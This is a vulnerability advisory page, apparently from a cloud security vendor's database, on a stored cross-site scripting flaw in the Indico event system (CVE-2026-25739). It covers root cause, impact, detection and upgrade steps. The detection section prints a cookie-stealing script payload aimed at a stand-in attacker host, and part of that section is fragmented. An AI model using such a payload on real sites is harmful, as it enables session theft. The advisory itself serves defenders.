
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-25739 is a stored Cross-Site Scripting (XSS) vulnerability in Indico, an open-source event management system developed by CERN. The flaw exists in the material upload functionality, where certain file types are not properly sanitized, allowing authenticated users to inject malicious scripts. All Indico versions prior to 3.3.10 are affected. The vulnerability was discovered by researcher dreyercito, disclosed on February 17, 2026, and patched in the same release. It carries a CVSS v3.1 base score of 5.4 (Medium) (GitHub Advisory).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation) and more specifically CWE-692 (Incomplete Denylist to Cross-Site Scripting), indicating that Indico relied on a denylist-based approach to filter dangerous file types or content, which was incomplete and could be bypassed (GitHub Advisory, Indico Advisory). An attacker with low-level privileges (e.g., a speaker or registered user) can upload a specially crafted file as event material; when a victim visits or downloads the material, the malicious script executes in their browser context. The scope is marked as "Changed," meaning the injected script can affect resources outside the vulnerable component's security boundary. No public proof-of-concept exploit code has been identified at this time.
Successful exploitation allows an authenticated attacker to execute arbitrary JavaScript in the browsers of other Indico users who interact with the malicious material, resulting in low confidentiality and integrity impacts (e.g., session token theft, credential harvesting, or unauthorized actions on behalf of the victim). Because the scope changes, the attack can cross security boundaries and affect users beyond the attacker's own session. Availability is not impacted. The risk is elevated in environments where speakers or external contributors are permitted to upload materials, as these roles are typically granted upload access by default (GitHub Advisory).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2026-25739. The EPSS score is approximately 0.043% (roughly the 19th percentile), indicating a low near-term exploitation probability (GitHub Advisory). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires a low-privilege authenticated account and victim user interaction, which limits the attack surface compared to unauthenticated vulnerabilities.
<script>document.location='https://attacker.com/?c='+document.cookie</script>)..html, .svg, .xml, or double-extension files) to material endpoints by low-privilege accounts; repeated access to material download URLs by multiple distinct users following a single upload event.The primary remediation is to upgrade Indico to version 3.3.10 or later, which contains the security fix (Indico Release). For nginx deployments using STATIC_FILE_METHOD set to xaccelredirect, administrators must also update the webserver configuration by adding add_header Content-Security-Policy $upstream_http_content_security_policy; to the .xsf/indico/ location block to benefit from the strict CSP for file downloads. As interim workarounds, apply a strict Content Security Policy at the webserver level for material download endpoints, and restrict material upload permissions to only trusted users (GitHub Advisory, Indico Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."